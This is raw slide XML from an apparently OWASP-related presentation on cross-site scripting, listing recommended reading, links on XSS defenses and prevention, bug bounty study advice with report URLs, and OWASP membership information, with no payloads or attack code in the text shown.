        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA81C92B-91AB-4A89-A5B8-3D4567A61E78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="767707" y="1674628"/>
            <a:ext cx="5328293" cy="4525963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCDCD4C4-9BB2-4CB3-8708-9EC985BAA379}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400800" y="1674628"/>
            <a:ext cx="5588000" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Mutillidae-test-scripts.txt        #Easter Egg File</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3953732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XSS – Cross site Scripting</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363794" y="1582994"/>
            <a:ext cx="10683617" cy="5168680"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Recommended Reading </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web Application Hacker’s Handbook (2nd Edition) - Chapter 12 - Attacking Users: Cross-Site Scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OWASP Testing Guide 4.0 - 4.8.1 Testing for Reflected Cross Site Scripting (OTG-INPVAL-001), 4.8.2 Testing for Stored Cross Site Scripting (OTG-INPVAL-002), 4.12.1 Testing for DOM based Cross Site Scripting (OTG-CLIENT-001)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mozilla Developer Network - Web Docs - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Introduction to the DOM</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B168943-7FD1-4A29-80E5-472458859515}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10927155" y="1466850"/>
            <a:ext cx="1148751" cy="1462696"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2F5A972-F4DC-4D48-956D-747E5F817213}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11047411" y="3708242"/>
            <a:ext cx="1028495" cy="1350336"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41075599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XSS – Prevent</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{904FE4F5-0819-4D83-92CC-8B6AE131C168}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1063752" y="1300235"/>
            <a:ext cx="5877822" cy="5371515"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14031122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XSS – Defenses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255640" y="1166070"/>
            <a:ext cx="10791772" cy="5505680"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>XSS TOP 10</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Aijn Abraham </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Xenotix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- tool to find XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>XSS Prevention </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>CWE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>API SECURITY </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>.Net XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>.Net XSS Microsoft</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>DOM XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="290839283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2C4B-CDAE-4E80-B536-3FC43B2E2348}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recommendations Bug Bounty </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F9D63EB-CAEE-4E0F-AC1F-554A654BDA02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Focus on one to two specific bugs (XSS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, CSRF, CORS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If its about $ then focus on the top paying bugs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Research, do all the training vulnerable applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do Real World Apps – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Pentester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Academy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Or download and install your own version of vulnerable apps.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB97A5ED-E5ED-49DB-9B0F-3A6637517028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7982467" y="3186996"/>
            <a:ext cx="4133333" cy="714286"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E762118B-ED0E-46E3-A577-7DE07F92AF1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3991492" y="4389283"/>
            <a:ext cx="5391150" cy="2468717"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10797008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9F87-BFA1-4427-9EEF-5D355F4064AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recommendations Bug Bounty </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15C27119-980C-4B5D-A88E-08AC180D6153}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Research other bug bounties and examine there payloads and techniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:hlinkClick r:id="rId2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://hackerone.com/reports/395944</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://hackerone.com/reports/106293</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://klikki.fi/adv/yahoo.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://blog.it-securityguard.com/bugbounty-the-5000-google-xss/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3875919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4825984" y="-22293"/>
            <a:ext cx="9905998" cy="690165"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OWASP Membership</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39011C62-99DC-4E31-8AC6-0ADD5942CB97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1083129" y="1494133"/>
            <a:ext cx="9133333" cy="1475570"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37F91C86-37E5-4992-96DF-54D946A71022}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="422788" y="2969703"/>
            <a:ext cx="11199492" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>OWASP MEMBERSHIP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EB034AE-E56A-4C66-A8C5-2F5EC2F3B22E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1083128" y="3459618"/>
            <a:ext cx="7867925" cy="3212132"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
